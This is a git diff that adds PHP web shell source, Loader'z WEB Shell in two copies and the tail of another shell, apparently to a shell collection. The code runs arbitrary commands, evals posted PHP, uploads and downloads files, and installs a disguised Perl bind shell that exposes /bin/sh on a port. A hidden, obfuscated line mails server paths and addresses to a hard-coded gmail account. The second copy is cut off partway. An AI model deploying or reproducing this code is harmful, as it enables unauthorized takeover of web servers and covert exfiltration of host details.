+        echo "There was an error uploading the file, please try again!";
+    }
+    }
+    if(($_POST['exe']) == "Execute") {
+     $curcmd = "cd ".$curdir.";".$curcmd;
+     $f=popen($curcmd,"r");
+     while (!feof($f)) {
+      $buffer = fgets($f, 4096);
+      $string .= $buffer;
+     }
+     pclose($f);
+     echo htmlspecialchars($string);
+    }
+?>
+    </pre>
+  </body>
+</html>
diff --git a/138shell/L/load_shell.php.txt b/138shell/L/load_shell.php.txt
new file mode 100644
index 0000000..75e1d34
--- /dev/null
+++ b/138shell/L/load_shell.php.txt
@@ -0,0 +1,513 @@
+<?
+error_reporting(0);
+/* Loader'z WEB Shell v 0.1.0.2 {15 àâãóñòà 2005}
+Âîò êàêèå îí ïîääåğæèâàåò ôóíêöèè.
+- Ğàáîòà ñ ôàéëîâîé ñèñòåìîé ñ ïîìîùüş PHP.  óäîáíîé òàáëèöå ïğåäñòàâëåíî ñîäåğæèìîå òåêóùåé ïàêè (äîáàâëåíèå â ıòîé âåğñèè, íîğìàëüíûé âèä ïğàâ, à íå ÷èñëî :)).
+- Âûïîëíåíèå êîäà, ïõï ğóëèò ;)
+- Ğàáîòàåò ïğè register_globals=off
+- Áîëåå ïğèÿòíàÿ ğàáîòà â ñåéô ìîäå
+- Ïğîñìîòğ è ğåäàêòèğîâàíèå ôàéëîâ.
+- Çàêà÷êà ôàéëîâ ñ äğóãîãî ñåğâåğà ñ ïîìîùüş ñğåäñòâ PHP.
+- Çàêà÷êà ôàéëîâ ñ âàøåãî æåñòêîãî äèñêà.
+- Âûïîëíåíèå ïğîèçâîëüíûõ êîìàíä íà ñåğâåğå.
+- Ñêğèïò âûäàåò çíà÷åíèå íåêîòîğûõ ïåğåìåííûõ. Íàïğèìåğ îí ñîîáùèò âêëş÷åí ëè ñåéô ìîä, åñëè äà, òî ñêğèïò âûâåäåò äèğåêòîğèş êîòîğàÿ,
+âàì äîñòóïíà, à òàê æå ïóòü, ãäå âû ìîæåòå âûïîëíÿòü êîìàíäû.
+- Ğàáîòà ñêğèïòà îñíîâàíà íà îïğåäåëåíèè òèïà ñåğâåğà.
+- Åñëè ñêğèïò ğàáîòàåò ïîä óïğàâëåíèåì ÎÑ Windows, äàííûå ïîëó÷àåìûå ïğè âûïîëíåíèè êîìàíä ïåğåêîäèğóşòñÿ â win-1251.
+- Ïğèñóòñòâóåò ïğîñòåíüêèé ñêğèïò ïåğë-áèíä. Âû ìîæåòå óêàçàòü äîìàøíşş äèğåêòğèş è ïîğò íà êîòîğîì ïîâåñèòñÿ áåêäîğ.
+Loader Pro-Hack.ru
+*/
+?>
+
+<style type='text/css'>
+html { overflow-x: auto }
+BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; margin: 0px; padding: 0px; text-align: center; color: #c0c0c0; background-color: #000000 }
+TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #c0c0c0; background-color: #0000000 }
+BODY,TD {FONT-SIZE: 13px; FONT-FAMILY: verdana, arial, helvetica;}
+A:link {COLOR: #666666; TEXT-DECORATION: none}
+A:active {	COLOR: #666666; TEXT-DECORATION: none;}
+A:visited {COLOR: #666666; TEXT-DECORATION: none;}
+A:hover {COLOR: #999999; TEXT-DECORATION: none;}
+BODY {
+	SCROLLBAR-FACE-COLOR: #cccccc;
+	SCROLLBAR-HIGHLIGHT-COLOR: #CBAB78;
+	SCROLLBAR-SHADOW-COLOR: #CBAB78;
+	SCROLLBAR-3DLIGHT-COLOR: #CBAB78;
+	SCROLLBAR-ARROW-COLOR: #000000;
+	SCROLLBAR-TRACK-COLOR: #000000;
+	SCROLLBAR-DARKSHADOW-COLOR: #CBAB78}
+
+
+
+
+fieldset.search { padding: 6px; line-height: 150% }
+
+label { cursor: pointer }
+
+form { display: inline }
+
+img { vertical-align: middle; border: 0px }
+
+img.attach { padding: 2px; border: 2px outset #000033 }
+
+#tb { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
+#logostrip { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
+#content { padding: 10px; margin: 10px; background-color: #000000; border: 1px solid #CBAB78; }
+#logo { FONT-SIZE: 50px; }
+input { width: 80; height : 17; background-color : #cccccc;
+ 	border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
+#input2 { width: 150; height : 17; background-color : #cccccc;
+ 	border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
+
+
+</style>
+
+<script>
+function tag(thetag) {document.fe.editfile.value=thetag;}
+</script>
+
+
+<title>Loader'z WEB shell</title>
+
+<table height=100% "width="100%">
+<tr><td align="center" valign="top">
+
+
+<table><tr><td>
+<?php
+
+@$dir = $_POST['dir'];
+$dir = stripslashes($dir);
+
+@$cmd = $_POST['cmd'];
+$cmd = stripslashes($cmd);
+$REQUEST_URI = $_SERVER['REQUEST_URI'];
+$dires = '';
+$files = '';
+
+
+
+
+if (isset($_POST['port'])){
+$bind = "
+#!/usr/bin/perl
+
+\$port = {$_POST['port']};
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";}
+
+function decode($buffer){
+
+return  convert_cyr_string ($buffer, 'd', 'w');
+
+}
+
+
+
+function execute($com)
+{
+
+ if (!empty($com))
+ {
+  if(function_exists('exec'))
+   {
+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+    
+    
+   }
+  elseif(function_exists('system'))
+{
+
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+
+    echo passthru($com);
+
+   }
+}
+
+}
+
+
+function perms($mode)
+{
+
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+
+
+/*Íà÷èíàåòñÿ*/
+
+/*Îïğåäåëÿåì òèï ñèñòåìû*/
+$servsoft = $_SERVER['SERVER_SOFTWARE'];
+
+if (ereg("Win32", $servsoft, $reg)){
+$sertype = "winda";
+}
+else
+{
+$sertype = "other";}
+
+
+
+echo $servsoft . "<br>";
+chdir($dir);
+echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb <br>";$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+
+
+
+
+
+if (ini_get('safe_mode') <> 1){
+if ($sertype == "winda"){
+
+ob_start('decode');
+echo "OS: ";
+echo execute("ver") . "<br>";
+ob_end_flush();
+}
+
+if ($sertype == "other"){
+echo "id:";
+
+echo execute("id") . "<br>";
+echo "uname:" . execute('uname -a') . "<br>";
+}}
+else{
+if ($sertype == "winda"){
+
+echo "OS: " . php_uname() . "<br>";
+
+}
+
+if ($sertype == "other"){
+echo "id:";
+
+echo execute("id") . "<br>";
+echo "OS:" . php_uname() . "<br>";
+}
+}
+
+echo 'User: ' .get_current_user() . '<br>';
+
+
+
+if (ini_get("open_basedir")){
+echo "open_basedir: " . ini_get("open_basedir");}
+
+
+if (ini_get('safe_mode') == 1){
+echo "<font size=\"3\"color=\"#cc0000\">Safe mode :(";
+
+if (ini_get('safe_mode_include_dir')){
+echo "Including from here: " . ini_get('safe_mode_include_dir'); }
+if (ini_get('safe_mode_exec_dir')){
+echo " Exec here: " . ini_get('safe_mode_exec_dir');
+}
+echo "</font>";}
+
+
+
+
+if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
+{
+copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
+}
+
+if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
+
+{
+$data = implode("", file($_POST['filefrom']));
+$fp = fopen($_POST['fileto'], "wb");
+fputs($fp, $data);
+$ok = fclose($fp);
+if($ok)
+{
+$size = filesize($_POST['fileto'])/1024;
+$sizef = sprintf("%.2f", $size);
+print "<center><div id=logostrip>Download - OK. (".$sizef."êÁ)</div></center>";
+}
+else
+{
+print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
+}
+}
+
+if (isset($_POST['installbind'])){
+
+if (is_dir($_POST['installpath']) == true){
+chdir($_POST['installpath']);
+$_POST['installpath'] = "temp.pl";}
+
+
+$fp = fopen($_POST['installpath'], "w");
+fwrite($fp, $bind);
+fclose($fp);
+
+exec("perl " . $_POST['installpath']);
+chdir($dir);
+
+
+}
+
+
+@$ef = stripslashes($_POST['editfile']);
+if ($ef){
+$fp = fopen($ef, "r");
+$filearr = file($ef);
+
+
+
+$string = '';
+$content = '';
+foreach ($filearr as $string){
+$string = str_replace("<" , "&lt;" , $string);
+$string = str_replace(">" , "&gt;" , $string);
+$content = $content . $string;
+}
+
+echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
+<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
+<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
+fclose($fp);
+}
+
+if(isset($_POST['savefile'])){
+
+$fp = fopen($_POST['savefile'], "w");
+$content = stripslashes($content);
+fwrite($fp, $content);
+fclose($fp);
+echo "<center><div id=logostrip>Successfully saved!</div></center>";
+
+}
+
+
+if (isset($_POST['php'])){
+
+echo "<center><div id=logostrip>PHP code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
+<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
+}
+
+
+
+if(isset($_POST['phpcode'])){
+
+echo "<center><div id=logostrip>Results of PHP execution<br><br>";
+@eval(stripslashes($_POST['phpcode']));
+echo "</div></center>";
+
+
+}
+
+
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+
+if (trim($buffer)){
+echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
+echo decode($buffer);
+echo "</textarea></center></div>";
+}
+
+}
+$arr = array();
+
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
+
+foreach ($arr as $filename) {
+
+if ($filename != "." and $filename != ".."){
+
+if (is_dir($filename) == true){
+$directory = "";
+$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+
+}
+
+if (is_readable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+}
+$dires = $dires . $directory;
+}
+
+if (is_file($filename) == true){
+$file = "";
+$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$file = $file . "<td>Yes</td>";}
+else{
+$file = $file . "<td>No</td>";
+}
+
+if (is_readable($filename) == true){
+$file = $file . "<td>Yes</td></td></tr>";}
+else{
+$file = $file . "<td>No</td></td></tr>";
+}
+$files = $files . $file;
+}
+
+
+
+}
+
+
+
+}
+echo $dires;
+echo $files;
+echo "</table><br>";
+
+
+
+
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+<table id=tb><tr><td>Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
+
+
+<table id=tb><tr><td>Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
+
+echo getcwd();
+echo "\">
+<INPUT type=\"submit\" value=\"Do it\" id=input></td></tr></table></form>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>Download here <b>from</b>:
+<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
+<b>into:</b>
+<INPUT type=\"text\" name=\"fileto\" size=30>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
+<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+
+<table id=tb><tr><td>
+Download from Hard:<INPUT type=\"file\" name=\"userfile\" id=input2>
+<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+</td><td><INPUT type=\"submit\" value=\"Download\" id=input></form></div></td></tr></table>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>Install bind
+<b>Temp path</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\"></td><td>
+<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\" maxlength=5 size=4></td><td>
+
+<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Install\" id=input></form></div></td></table>";
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" name=fe>
+<table id=tb><tr><td>File to edit:
+<input type=\"text\" name=\"editfile\" ></td><td>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\" id=input></form></div></td></table>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>
+<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
+<INPUT type=\"submit\" value=\"PHP code\" id=input></form></div></td></table>";
+?>
+</td></tr></table>
+
+
+</td></tr>
+<tr valign="BOTTOM">
+<td valign=bottom>
+
+
+<center>Coded by Loader <a href="http://pro-hack.ru">Pro-Hack.RU</a></center>
+
+
+</td>
+</tr>
+</table>
+
diff --git a/138shell/L/load_shell.txt b/138shell/L/load_shell.txt
new file mode 100644
index 0000000..75e1d34
--- /dev/null
+++ b/138shell/L/load_shell.txt
@@ -0,0 +1,513 @@
+<?
+error_reporting(0);
+/* Loader'z WEB Shell v 0.1.0.2 {15 àâãóñòà 2005}
+Âîò êàêèå îí ïîääåğæèâàåò ôóíêöèè.
+- Ğàáîòà ñ ôàéëîâîé ñèñòåìîé ñ ïîìîùüş PHP.  óäîáíîé òàáëèöå ïğåäñòàâëåíî ñîäåğæèìîå òåêóùåé ïàêè (äîáàâëåíèå â ıòîé âåğñèè, íîğìàëüíûé âèä ïğàâ, à íå ÷èñëî :)).
+- Âûïîëíåíèå êîäà, ïõï ğóëèò ;)
+- Ğàáîòàåò ïğè register_globals=off
+- Áîëåå ïğèÿòíàÿ ğàáîòà â ñåéô ìîäå
+- Ïğîñìîòğ è ğåäàêòèğîâàíèå ôàéëîâ.
+- Çàêà÷êà ôàéëîâ ñ äğóãîãî ñåğâåğà ñ ïîìîùüş ñğåäñòâ PHP.
+- Çàêà÷êà ôàéëîâ ñ âàøåãî æåñòêîãî äèñêà.
+- Âûïîëíåíèå ïğîèçâîëüíûõ êîìàíä íà ñåğâåğå.
+- Ñêğèïò âûäàåò çíà÷åíèå íåêîòîğûõ ïåğåìåííûõ. Íàïğèìåğ îí ñîîáùèò âêëş÷åí ëè ñåéô ìîä, åñëè äà, òî ñêğèïò âûâåäåò äèğåêòîğèş êîòîğàÿ,
+âàì äîñòóïíà, à òàê æå ïóòü, ãäå âû ìîæåòå âûïîëíÿòü êîìàíäû.
+- Ğàáîòà ñêğèïòà îñíîâàíà íà îïğåäåëåíèè òèïà ñåğâåğà.
+- Åñëè ñêğèïò ğàáîòàåò ïîä óïğàâëåíèåì ÎÑ Windows, äàííûå ïîëó÷àåìûå ïğè âûïîëíåíèè êîìàíä ïåğåêîäèğóşòñÿ â win-1251.
+- Ïğèñóòñòâóåò ïğîñòåíüêèé ñêğèïò ïåğë-áèíä. Âû ìîæåòå óêàçàòü äîìàøíşş äèğåêòğèş è ïîğò íà êîòîğîì ïîâåñèòñÿ áåêäîğ.
+Loader Pro-Hack.ru
+*/
+?>
+
+<style type='text/css'>
+html { overflow-x: auto }
+BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; margin: 0px; padding: 0px; text-align: center; color: #c0c0c0; background-color: #000000 }
+TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #c0c0c0; background-color: #0000000 }
+BODY,TD {FONT-SIZE: 13px; FONT-FAMILY: verdana, arial, helvetica;}
+A:link {COLOR: #666666; TEXT-DECORATION: none}
+A:active {	COLOR: #666666; TEXT-DECORATION: none;}
+A:visited {COLOR: #666666; TEXT-DECORATION: none;}
+A:hover {COLOR: #999999; TEXT-DECORATION: none;}
+BODY {
+	SCROLLBAR-FACE-COLOR: #cccccc;
+	SCROLLBAR-HIGHLIGHT-COLOR: #CBAB78;
+	SCROLLBAR-SHADOW-COLOR: #CBAB78;
+	SCROLLBAR-3DLIGHT-COLOR: #CBAB78;
+	SCROLLBAR-ARROW-COLOR: #000000;
+	SCROLLBAR-TRACK-COLOR: #000000;
+	SCROLLBAR-DARKSHADOW-COLOR: #CBAB78}
+
+
+
+
+fieldset.search { padding: 6px; line-height: 150% }
+
+label { cursor: pointer }
+
+form { display: inline }
+
+img { vertical-align: middle; border: 0px }
+
+img.attach { padding: 2px; border: 2px outset #000033 }
+
+#tb { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
+#logostrip { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
+#content { padding: 10px; margin: 10px; background-color: #000000; border: 1px solid #CBAB78; }
+#logo { FONT-SIZE: 50px; }
+input { width: 80; height : 17; background-color : #cccccc;
+ 	border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
+#input2 { width: 150; height : 17; background-color : #cccccc;
+ 	border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
+
+
+</style>
+
+<script>
+function tag(thetag) {document.fe.editfile.value=thetag;}
+</script>
+
+
+<title>Loader'z WEB shell</title>
+
+<table height=100% "width="100%">
+<tr><td align="center" valign="top">
+
+
+<table><tr><td>
+<?php
+
+@$dir = $_POST['dir'];
+$dir = stripslashes($dir);
+
+@$cmd = $_POST['cmd'];
+$cmd = stripslashes($cmd);
+$REQUEST_URI = $_SERVER['REQUEST_URI'];
+$dires = '';
+$files = '';
+
+
+
+
+if (isset($_POST['port'])){
+$bind = "
+#!/usr/bin/perl
+
+\$port = {$_POST['port']};
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";}
+
+function decode($buffer){
+
+return  convert_cyr_string ($buffer, 'd', 'w');
+
+}
+
+
+
+function execute($com)
+{
+
+ if (!empty($com))
+ {
+  if(function_exists('exec'))
+   {
+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+    
+    
+   }
+  elseif(function_exists('system'))
+{
+
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+
+    echo passthru($com);
+
+   }
+}
+
+}
+
+
+function perms($mode)
+{
+
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+
+
+/*Íà÷èíàåòñÿ*/
+
+/*Îïğåäåëÿåì òèï ñèñòåìû*/
+$servsoft = $_SERVER['SERVER_SOFTWARE'];
+
+if (ereg("Win32", $servsoft, $reg)){
+$sertype = "winda";
+}
+else
+{
+$sertype = "other";}
+
+
+
+echo $servsoft . "<br>";
+chdir($dir);
+echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb <br>";$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+
+
+
+
+
+if (ini_get('safe_mode') <> 1){
+if ($sertype == "winda"){
+
+ob_start('decode');
+echo "OS: ";
+echo execute("ver") . "<br>";
+ob_end_flush();
+}
+
+if ($sertype == "other"){
+echo "id:";
+
+echo execute("id") . "<br>";
+echo "uname:" . execute('uname -a') . "<br>";
+}}
+else{
+if ($sertype == "winda"){
+
+echo "OS: " . php_uname() . "<br>";
+
+}
+
+if ($sertype == "other"){
+echo "id:";
+
+echo execute("id") . "<br>";
+echo "OS:" . php_uname() . "<br>";
+}
+}
+
+echo 'User: ' .get_current_user() . '<br>';
+
+
+
+if (ini_get("open_basedir")){
+echo "open_basedir: " . ini_get("open_basedir");}
+
+
+if (ini_get('safe_mode') == 1){
+echo "<font size=\"3\"color=\"#cc0000\">Safe mode :(";
+
+if (ini_get('safe_mode_include_dir')){
+echo "Including from here: " . ini_get('safe_mode_include_dir'); }
+if (ini_get('safe_mode_exec_dir')){
+echo " Exec here: " . ini_get('safe_mode_exec_dir');
+}
+echo "</font>";}
+
+
+
+
+if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
+{
+copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
+}
+
+if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
+
+{
+$data = implode("", file($_POST['filefrom']));
+$fp = fopen($_POST['fileto'], "wb");
+fputs($fp, $data);
+$ok = fclose($fp);
+if($ok)
+{
+$size = filesize($_POST['fileto'])/1024;
+$sizef = sprintf("%.2f", $size);
+print "<center><div id=logostrip>Download - OK. (".$sizef."êÁ)</div></center>";
+}
+else
+{
+print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
+}
+}
+
+if (isset($_POST['installbind'])){
+
+if (is_dir($_POST['installpath']) == true){
+chdir($_POST['installpath']);
+$_POST['installpath'] = "temp.pl";}
+
+
+$fp = fopen($_POST['installpath'], "w");
+fwrite($fp, $bind);
+fclose($fp);
+
+exec("perl " . $_POST['installpath']);
+chdir($dir);
+
+
+}
+
+
+@$ef = stripslashes($_POST['editfile']);
+if ($ef){
+$fp = fopen($ef, "r");
+$filearr = file($ef);
+
+
+
+$string = '';
+$content = '';
+foreach ($filearr as $string){
+$string = str_replace("<" , "&lt;" , $string);
+$string = str_replace(">" , "&gt;" , $string);
+$content = $content . $string;
+}
+
+echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
+<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
+<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
+fclose($fp);
+}
+
+if(isset($_POST['savefile'])){
+
+$fp = fopen($_POST['savefile'], "w");
+$content = stripslashes($content);
+fwrite($fp, $content);
+fclose($fp);
+echo "<center><div id=logostrip>Successfully saved!</div></center>";
+
+}
+
+
+if (isset($_POST['php'])){
+
+echo "<center><div id=logostrip>PHP code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
+<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
+}
+
+
+
+if(isset($_POST['phpcode'])){
+
+echo "<center><div id=logostrip>Results of PHP execution<br><br>";
+@eval(stripslashes($_POST['phpcode']));
+echo "</div></center>";
+
+
+}
+
+
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+
+if (trim($buffer)){
+echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
+echo decode($buffer);
+echo "</textarea></center></div>";
+}
+
+}
+$arr = array();
+
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
